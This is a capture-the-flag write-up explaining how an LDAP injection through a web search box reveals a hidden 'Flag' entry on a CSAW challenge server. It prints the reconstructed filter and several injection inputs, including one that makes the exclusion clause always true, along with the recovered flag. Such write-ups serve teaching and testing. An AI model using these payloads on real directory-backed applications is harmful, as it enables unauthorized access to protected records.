Tags: ldap injection
Rating:
**Description**
> _dab_
>
> `http://web.chal.csaw.io:8080`
**No files provided**
**Solution**
We can see a directory of users:
The weird column names and the title of the challenge can quickly lead us to finding out about Lightweight Directory Access Protocol (LDAP). More specifically, [LDAP filters](https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol#Search_and_Compare) and even better - [LDAP injection](https://www.owasp.org/index.php/Testing_for_LDAP_Injection_%28OTG-INPVAL-006%29).
A simple way to verify if the page is vulnerable is with test strings like `*` (should show all users), `Pete*` / `P*te` (should show Pete), before moving on to injections with `(` and `)`.
The page always shows results with `OU` (object class?) value of `Employees`, and whatever we type into the search box must match the `GivenName` column. Presumably there is an entry in the database that never shows up, which will contain the flag itself. This is the filter used (shamelessly stolen from the source):
filter: (&(objectClass=person)(&(givenName=<input>)(!(givenName=Flag))))
intended meaning:
(objectClass is person)
AND
(
(givenName is <input>)
AND
NOT(givenName is Flag)
)
We can verify this is the case without much damage (yet):
input: *)(givenName=Pete
filter: (&(objectClass=person)(&(givenName=*)(givenName=Pete)(!(givenName=Flag))))
meaning:
(objectClass is person)
AND
(
(givenName is any)
AND
(givenName is Pete)
AND
NOT(givenName is Flag)
)
And indeed, only Pete shows up. Let's try a proper injection:
input: *))(|(objectClass=*
filter: (&(objectClass=person)(&(givenName=*))(|(objectClass=*)(!(givenName=Flag))))
meaning:
(objectClass is person)
AND
(
(givenName is any)
)
AND
(
(objectClass is ANY)
OR
NOT(givenName is Flag)
)
As you can see, the flag exclusion mechanism became optional (either the entry is not the flag OR its object class is any, which is always true). And with that, we can see the flag:
`flag{ld4p_inj3ction_i5_a_th1ng}`
